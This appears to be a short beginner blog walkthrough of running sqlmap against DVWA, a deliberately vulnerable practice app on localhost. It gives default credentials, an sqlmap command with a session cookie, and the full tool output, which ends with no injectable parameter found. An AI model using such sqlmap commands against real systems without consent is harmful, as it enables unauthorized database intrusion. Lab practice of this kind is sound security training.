running your apache & mysql
so type localhost/dwva ant it will open new web page about dwva
login
user : admin
pass : password
it's will open new web page
http://localhost/dvwa/vulnerabilities/fi/?page=include.php
type a number on user id it's,
so now scaning using sqlmap
open your sqlmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" -T users --column
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 03:24:54
[03:24:55] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:24:55] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
[03:25:00] [INFO] testing if the url is stable, wait a few seconds
[03:25:01] [INFO] url is stable
[03:25:01] [INFO] testing if GET parameter 'id' is dynamic
[03:25:01] [WARNING] GET parameter 'id' appears to be not dynamic
[03:25:01] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[03:25:01] [INFO] testing sql injection on GET parameter 'id'
[03:25:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:25:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[03:25:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[03:25:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[03:25:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[03:25:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:25:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[03:25:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[03:25:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:25:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[03:25:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[03:25:03] [INFO] testing 'Oracle AND time-based blind'
[03:25:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[03:25:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[03:25:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[03:25:06] [WARNING] GET parameter 'id' is not injectable
[03:25:06] [INFO] testing if GET parameter 'Submit' is dynamic
[03:25:06] [WARNING] GET parameter 'Submit' appears to be not dynamic
[03:25:06] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[03:25:06] [INFO] testing sql injection on GET parameter 'Submit'
[03:25:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:25:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[03:25:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[03:25:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[03:25:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[03:25:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:25:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[03:25:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[03:25:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:25:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[03:25:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[03:25:08] [INFO] testing 'Oracle AND time-based blind'
[03:25:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[03:25:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[03:25:11] [WARNING] GET parameter 'Submit' is not injectable
[03:25:11] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
[*] shutting down at: 03:25:11
@keep smile & spirit
be fun.
Tidak ada komentar:
Posting Komentar